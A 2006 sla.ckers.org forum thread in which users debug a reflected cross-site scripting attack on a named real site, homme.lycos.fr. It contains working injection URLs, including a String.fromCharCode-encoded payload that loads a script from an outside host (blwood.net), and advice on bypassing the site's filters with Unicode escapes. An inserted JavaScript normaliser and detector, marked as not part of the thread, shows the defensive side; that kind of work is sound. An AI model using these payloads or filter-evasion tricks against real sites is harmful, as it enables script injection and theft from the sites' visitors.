Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Injecting iframe
Posted by: Girzi
Date: August 27, 2006 12:46PM

Hi,
Using a reflected XSS, I use it to make something like <script src="http://domain.com/myfile.js"></script> but I had to encode it and use eval + String.fromCharCode. Now myfile.js contains this code:
document.write('<iframe src="http://domaine.com/"></iframe>');

In IE it works! But FF doesn't want it! Do you know why?

Thanks for the help

Re: Injecting iframe
Posted by: rsnake
Date: August 27, 2006 02:43PM

It could be a number of problems, can you show the entire string (encoded)? It is either a problem with how Firefox deals with JavaScript variables or something else weird... ooor it could be a problem with your particular browser (if you have iframes turned off in Greasemonkey or something).

- RSnake
Gotta love it. http://ha.ckers.org

Re: Injecting iframe
Posted by: Girzi
Date: August 27, 2006 02:56PM

Here it is:
http://www.homme.lycos.fr/hotbabes/categorie/%22%20%3Cbody%20onload=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,98,108,119,111,111,100,46,110,101,116,47,101,120,112,101,114,105,101,110,99,101,115,47,108,121,99,111,115,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59))%3E

(There were some weird filters :P)

Decoded: document.write('<script src=http://blwood.net/experiences/lycos.js></script>')


But I think I know why: my XSS is loaded something like 30 times with a body onload =)

Anyway, I found another XSS that is much easier to exploit on this site for my PoC =)

Re: Injecting iframe
Posted by: rsnake
Date: August 27, 2006 06:29PM

Hmmm... the basics work for me: http://www.homme.lycos.fr/hotbabes/categorie/%22%20%20%3Cbody%20onload=alert(%22XSS%22)%3E
If you just use document.write and escape the quote, etc... with things like \u0022 it should work. This is a common problem with XSS actually, running out of ways to quote things. In this case, it looks like \ does work, although / does not, so you should be okay to use Unicode JavaScript escapes.

Re: Injecting iframe
Posted by: Girzi
Date: August 28, 2006 02:32AM

Yeah, this one works: http://www.homme.lycos.fr/hotbabes/categorie/%22%20%20%3Cbody%20onload=alert(%22XSS%22)%3E

But I had to use the encoded version because it doesn't like my / =)
Anyway, I found another XSS that is much better.

Thx for the help, rsnake :)

Re: Injecting iframe
Posted by: rsnake
Date: August 28, 2006 10:20AM

Yah, but just to be clear, you actually don't have to encode the entire string just to get rid of a forward slash:

document.write("http:\u002F\u002Fha.ckers.org\u002F")

- RSnake
Gotta love it. http://ha.ckers.org

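The two encodings this thread turns on, JavaScript \uXXXX escapes (rsnake's \u002F trick) and eval(String.fromCharCode(...)), are exactly what a filter that only looks at the raw parameter never sees. The following is an added example, not code from the thread: a small normaliser that decodes both forms until nothing changes, so a detector inspects the string the JS engine would actually run. The sample inputs are taken from the posts above; the filter and detector functions are hypothetical, constructed for the example.

```javascript
// Added example (not from the thread). Decodes the two encodings seen above
// so that a detector sees what the browser will execute, not the raw bytes.

// JavaScript string escapes: \uXXXX and \xXX -> the character they denote.
function decodeJsEscapes(s) {
  return s.replace(/\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})/g, (_m, u, x) =>
    String.fromCharCode(parseInt(u !== undefined ? u : x, 16))
  );
}

// String.fromCharCode(100,111,...) -> the literal string it builds.
function decodeFromCharCode(s) {
  return s.replace(/String\.fromCharCode\(\s*([\d\s,]+)\)/g, (_m, list) =>
    list.split(",").map((n) => String.fromCharCode(parseInt(n.trim(), 10))).join("")
  );
}

// Apply both decoders until a fixed point, so nested encodings also unwrap.
function normalize(s) {
  let prev;
  let cur = s;
  do {
    prev = cur;
    cur = decodeJsEscapes(decodeFromCharCode(prev));
  } while (cur !== prev);
  return cur;
}

// Hypothetical filter like the one Girzi ran into: rejects any raw "/".
function rawSlashFilter(raw) {
  return /\//.test(raw);
}

// Hypothetical detector run on the normalised string instead of the raw one.
const SUSPICIOUS = /<script|document\.write|<iframe|javascript:/i;
function looksLikeXss(raw) {
  return SUSPICIOUS.test(normalize(raw));
}

// Sample inputs taken from the posts above (JS source, so "\\u" is a literal \u).
const SAMPLE_ESCAPED = 'document.write("http:\\u002F\\u002Fha.ckers.org\\u002F")';
const SAMPLE_CHARCODE =
  "eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,98,108,119,111,111,100,46,110,101,116,47,101,120,112,101,114,105,101,110,99,101,115,47,108,121,99,111,115,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59))";
```

rawSlashFilter passes both samples because neither contains a literal "/", while normalize reveals the slashes and the script tag that looksLikeXss then flags.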
Re: Injecting iframe
Posted by: Girzi
Date: August 28, 2006 11:30AM

Ahhhh OK, thx! I didn't know this one O_o
I think I have to learn some details about encoding; it's very interesting stuff for bypassing the filters I saw =)

Thank you !


PS: Do you have some interesting links about this stuff xD?
